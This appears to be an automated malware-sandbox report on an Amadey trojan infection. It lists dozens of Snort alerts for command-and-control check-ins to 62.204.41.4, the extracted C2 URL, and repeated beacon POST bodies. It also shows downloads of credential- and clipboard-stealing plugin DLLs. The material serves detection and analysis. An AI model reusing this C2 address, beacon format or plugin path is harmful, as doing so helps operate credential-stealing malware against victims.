                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49981 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49982 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49983 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49984 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49985 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49986 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49987 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49988 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49989 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49990 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49991 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49992 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49993 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49994 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49995 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49996 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49997 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49998 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:49999 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50000 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50001 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50002 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50003 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50004 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50005 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50006 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50007 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50008 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50009 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50010 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50011 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50012 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50013 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50014 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50015 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50016 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50017 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50018 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50019 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50020 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50021 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50022 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50023 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50024 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50025 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50026 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50027 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50028 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50029 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50030 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50031 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50032 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50033 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50034 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50035 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50036 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50037 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50038 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50039 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50040 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50041 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50042 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50043 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50044 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50045 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50046 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50047 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50048 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50049 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50050 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50051 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50052 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50053 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50054 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50055 -> 62.204.41.4:80
                            Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50056 -> 62.204.41.4:80
                            Source: Malware configuration extractor URLs: 62.204.41.4/Gol478Ns/index.php
                            Source: global traffic HTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 87 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global traffic HTTP traffic detected: GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1 Host: 62.204.41.4
                            Source: global traffic HTTP traffic detected: GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1 Host: 62.204.41.4
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
                            Source: global trafficHTTP traffic detected: POST /Gol478Ns/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.204.41.4Content-Length: 87Cache-Control: no-cacheData Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 34 31 37 30 30 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=141700&un=user&dm=&av=13&lv=0&og=1
